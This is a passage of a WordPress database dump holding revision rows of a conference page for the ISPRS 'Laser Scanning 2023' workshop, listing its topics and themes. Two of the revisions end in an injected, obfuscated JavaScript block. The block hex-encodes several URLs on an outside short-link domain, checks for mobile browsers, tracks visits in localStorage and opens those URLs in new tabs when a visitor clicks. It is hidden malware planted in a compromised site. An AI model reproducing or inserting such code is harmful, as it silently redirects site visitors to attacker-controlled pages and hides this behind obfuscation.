center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:10:50','2022-11-02 16:10:50','',2949,'https://gsw2023.com/?p=2956',0,'revision','',0),
(2957,1,'2022-11-02 16:33:13','2022-11-02 16:33:13','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<u>Themes of event:</u></p>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\"><p><strong>Acquisition </strong></p>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\"><p><strong>System and Signal analysis </strong></p>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\"><p><strong>Point Cloud Processing </strong></p>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\"><p><strong>Applications</strong></p>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u>Scientific Committee:</u></p>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<p><u>Supporting ISPRS Working Groups:</u></p>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:33:13','2022-11-02 16:33:13','',2949,'https://gsw2023.com/?p=2957',0,'revision','',0),
(2958,1,'2022-11-02 16:35:30','2022-11-02 16:35:30','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, 